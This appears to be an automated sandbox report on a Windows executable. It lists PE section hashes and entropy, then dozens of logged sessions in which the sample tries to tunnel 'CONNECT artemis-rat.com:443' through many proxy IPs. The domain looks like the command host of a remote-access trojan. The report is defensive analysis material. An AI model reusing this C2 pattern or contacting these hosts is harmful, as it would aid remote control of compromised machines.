                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xc0000x5d6.rsrc
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0xa4000x18e0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0xb9b80x38.text
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x9a78 | 0x9c00 | c06507664f6fdc73197ad2d8aa61a1e1 | False | 0.5942007211538461 | data | 6.336720567337779 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xc000 | 0x5d6 | 0x600 | f1ee9f02a5cb6e37adf0d993ee3f387b | False | 0.4186197916666667 | data | 4.124252649326652 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0xc0a0 | 0x34c | data |  |  | 0.4099526066350711
RT_MANIFEST | 0xc3ec | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators |  |  | 0.5489795918367347
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49730 | 211.234.125.5 | 443 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:37.024704933 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49741 | 211.234.125.5 | 443 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:37.046173096 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2192.168.2.549750211.234.125.54433876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:37.062390089 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            3192.168.2.549753211.234.125.54433876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:37.065145016 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            4192.168.2.549721104.16.25.216803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:37.162008047 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:37.316281080 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:37 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            5192.168.2.549727172.67.200.220803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:37.172789097 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:37.327132940 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:37 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            6192.168.2.549711184.169.154.119803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:37.174758911 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:37.349553108 CET | 116 | IN | HTTP/1.1 200 OK
Date: Mon, 11 Mar 2024 02:30:37 GMT
Server: nginx
Content-Type: text/plain
Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            7192.168.2.54973550.63.12.101106473876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:37.200896978 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:37.654917955 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.154901981 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.154918909 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:41.154879093 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.217761993 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:45.239248991 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:49.405343056 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:57.475188971 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.5 | 49752 | 104.16.224.33 | 80 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:37.221856117 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:37.376415968 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:37 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.5 | 49766 | 172.67.105.234 | 80 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:37.245171070 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:37.399528980 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:37 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.5 | 49855 | 103.133.222.170 | 443 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:37.281909943 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.5 | 49858 | 103.133.222.170 | 443 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:37.286183119 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.5 | 49787 | 104.23.141.196 | 80 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:37.298402071 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:37.453550100 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:37 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.5 | 49722 | 51.38.231.41 | 80 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:37.320893049 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:37.631784916 CET | 441 | IN | HTTP/1.1 405 Method Not Allowed
Date: Mon, 11 Mar 2024 02:30:37 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
Allow: OPTIONS,GET,HEAD,POST,TRACE
Content-Length: 225
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method CONNECT is not allowed for the URL /.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.5 | 49805 | 172.67.181.144 | 80 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:37.345093012 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:37.499386072 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:37 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            15192.168.2.549734185.164.163.13581183876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:37.345211983 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:37.669172049 CET | 132 | IN | HTTP/1.1 503 Too many open connections
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: Maximum number of open connections reached.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            16192.168.2.54977554.152.3.36803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:37.345324039 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:37.562995911 CET | 116 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:37 GMT
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            17192.168.2.549745203.74.125.1888883876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:37.346765995 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:37.637679100 CET | 741 | IN | HTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Server: nginx/1.25.0
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:37 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 579
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>500 Internal Server Error</title></head><body><center><h1>500 Internal Server Error</h1></center><hr><center>nginx/1.25.0</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            18192.168.2.549830162.159.247.57803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:37.408575058 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:37.569703102 CET | 316 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:37 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            19192.168.2.54992545.144.30.2324433876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:37.416883945 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            20192.168.2.54992645.144.30.2324433876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:37.417731047 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            21192.168.2.54992745.144.30.2324433876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:37.419487953 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            22192.168.2.54992945.144.30.2324433876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:37.420969009 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            23192.168.2.549847172.67.253.69803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.427696943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.582329035 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:37 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            24192.168.2.549824209.126.104.38124573876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.445537090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.967304945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.592367887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.842346907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.389673948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            25192.168.2.549765213.57.128.161803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.454576015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.820988894 CET340INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.12.2
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:37 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Content-Length: 173
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            26192.168.2.549869172.67.181.32803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.454895973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.609363079 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:37 GMT
